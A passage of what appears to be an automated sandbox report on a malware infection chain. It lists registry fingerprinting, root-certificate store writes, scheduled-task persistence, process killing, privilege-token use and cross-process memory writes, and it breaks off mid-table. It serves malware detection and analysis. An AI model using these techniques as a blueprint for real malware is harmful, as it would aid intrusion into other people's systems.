description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString bncn6rv.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2704 timeout.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer packed.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer PQkVDtx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer PQkVDtx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer packed.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 804 taskkill.exe 3340 taskkill.exe 2692 taskkill.exe 3124 taskkill.exe 3172 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 rapes.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 9fd60dd4c9.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 9fd60dd4c9.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 rapes.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 9fd60dd4c9.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1704 schtasks.exe 4012 schtasks.exe 2388 schtasks.exe 2260 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1628 random.exe 2336 rapes.exe 2892 HmngBpR.exe 2892 HmngBpR.exe 1612 SplashWin.exe 1192 SplashWin.exe 1192 SplashWin.exe 1192 SplashWin.exe 2912 cmd.exe 2912 cmd.exe 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 340 Seat.com 1312 T0QdO0l.exe 5092 powershell.exe 2224 pwHxMTy.exe 2224 pwHxMTy.exe 2224 pwHxMTy.exe 2224 pwHxMTy.exe 2480 bncn6rv.exe 2480 bncn6rv.exe 2480 bncn6rv.exe 3192 chrome.exe 3192 chrome.exe 2480 bncn6rv.exe 2480 bncn6rv.exe 2480 bncn6rv.exe 3184 powershell.exe 4628 23a2f3c287.exe 2444 571017d6c6.exe 5004 powershell.exe 3956 powershell.exe 3956 powershell.exe 3956 powershell.exe 4704 powershell.exe 3312 yUI6F6C.exe 2372 CgmaT61.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 380 TempDHIF15WKYSZZZNVDPVNIJ3QHRQPBW9FQ.EXE 2116 powershell.exe 3460 powershell.exe 2692 powershell.exe 3184 powershell.exe 3184 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1192 SplashWin.exe 2912 cmd.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeDebugPrivilege 852 tasklist.exe Token: SeDebugPrivilege 940 tasklist.exe Token: SeDebugPrivilege 1312 T0QdO0l.exe Token: SeDebugPrivilege 1312 T0QdO0l.exe Token: SeDebugPrivilege 5092 powershell.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeDebugPrivilege 5004 powershell.exe Token: SeDebugPrivilege 3956 powershell.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 2532 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 3460 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeDebugPrivilege 3212 8096f0397d.exe Token: SeDebugPrivilege 804 taskkill.exe Token: SeDebugPrivilege 3340 taskkill.exe Token: SeDebugPrivilege 2692 taskkill.exe Token: SeDebugPrivilege 3124 taskkill.exe Token: SeDebugPrivilege 3172 taskkill.exe Token: SeDebugPrivilege 4088 firefox.exe Token: SeDebugPrivilege 4088 firefox.exe Token: SeDebugPrivilege 4024 220a009b82.exe Token: SeDebugPrivilege 4384 powershell.exe Token: SeDebugPrivilege 1912 powershell.exe Token: SeDebugPrivilege 3168 powershell.exe Token: SeDebugPrivilege 2672 powershell.exe Token: SeShutdownPrivilege 2476 chrome.exe Token: SeShutdownPrivilege 2476 chrome.exe Token: SeShutdownPrivilege 2476 chrome.exe Token: SeShutdownPrivilege 2476 chrome.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 1628 random.exe 340 Seat.com 340 Seat.com 340 Seat.com 3136 amnew.exe 3192 chrome.exe 1992 35f0ddbec0.exe 1992 35f0ddbec0.exe 1992 35f0ddbec0.exe 3108 TradeHub.com 3108 TradeHub.com 3108 TradeHub.com 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 4088 firefox.exe 4088 firefox.exe 4088 firefox.exe 4088 firefox.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 2476 chrome.exe -
Suspicious use of SendNotifyMessage 23 IoCs
pid Process 340 Seat.com 340 Seat.com 340 Seat.com 1992 35f0ddbec0.exe 1992 35f0ddbec0.exe 1992 35f0ddbec0.exe 3108 TradeHub.com 3108 TradeHub.com 3108 TradeHub.com 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 1932 59249c90a1.exe 4088 firefox.exe 4088 firefox.exe 4088 firefox.exe 1932 59249c90a1.exe 1932 59249c90a1.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2892 HmngBpR.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1628 wrote to memory of 2336 1628 random.exe 30 PID 1628 wrote to memory of 2336 1628 random.exe 30 PID 1628 wrote to memory of 2336 1628 random.exe 30 PID 1628 wrote to memory of 2336 1628 random.exe 30 PID 2336 wrote to memory of 2892 2336 rapes.exe 33 PID 2336 wrote to memory of 2892 2336 rapes.exe 33 PID 2336 wrote to memory of 2892 2336 rapes.exe 33 PID 2336 wrote to memory of 2892 2336 rapes.exe 33 PID 2892 wrote to memory of 1612 2892 HmngBpR.exe 34 PID 2892 wrote to memory of 1612 2892 HmngBpR.exe 34 PID 2892 wrote to memory of 1612 2892 HmngBpR.exe 34 PID 2892 wrote to memory of 1612 2892 HmngBpR.exe 34 PID 1612 wrote to memory of 1192 1612 SplashWin.exe 35 PID 1612 wrote to memory of 1192 1612 SplashWin.exe 35 PID 1612 wrote to memory of 1192 1612 SplashWin.exe 35 PID 1612 wrote to memory of 1192 1612 SplashWin.exe 35 PID 1192 wrote to memory of 2912 1192 SplashWin.exe 36 PID 1192 wrote to memory of 2912 1192 SplashWin.exe 36 PID 1192 wrote to memory of 2912 1192 SplashWin.exe 36 PID 1192 wrote to memory of 2912 1192 SplashWin.exe 36 PID 1192 wrote to memory of 2912 1192 SplashWin.exe 36 PID 2336 wrote to memory of 1252 2336 rapes.exe 38 PID 2336 wrote to memory of 1252 2336 rapes.exe 38 PID 2336 wrote to memory of 1252 2336 rapes.exe 38 PID 2336 wrote to memory of 1252 2336 rapes.exe 38 PID 1252 wrote to memory of 1656 1252 ADFoyxP.exe 39 PID 1252 wrote to memory of 1656 1252 ADFoyxP.exe 39 PID 1252 wrote to memory of 1656 1252 ADFoyxP.exe 39 PID 1252 wrote to memory of 1656 1252 ADFoyxP.exe 39 PID 1656 wrote to memory of 1892 1656 cmd.exe 41 PID 1656 wrote to memory of 1892 1656 cmd.exe 41 PID 1656 wrote to 